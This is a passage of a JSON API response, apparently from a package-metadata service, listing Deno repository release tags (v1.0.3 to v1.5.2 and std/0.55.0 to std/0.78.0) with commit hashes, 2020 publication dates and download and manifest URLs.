F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d26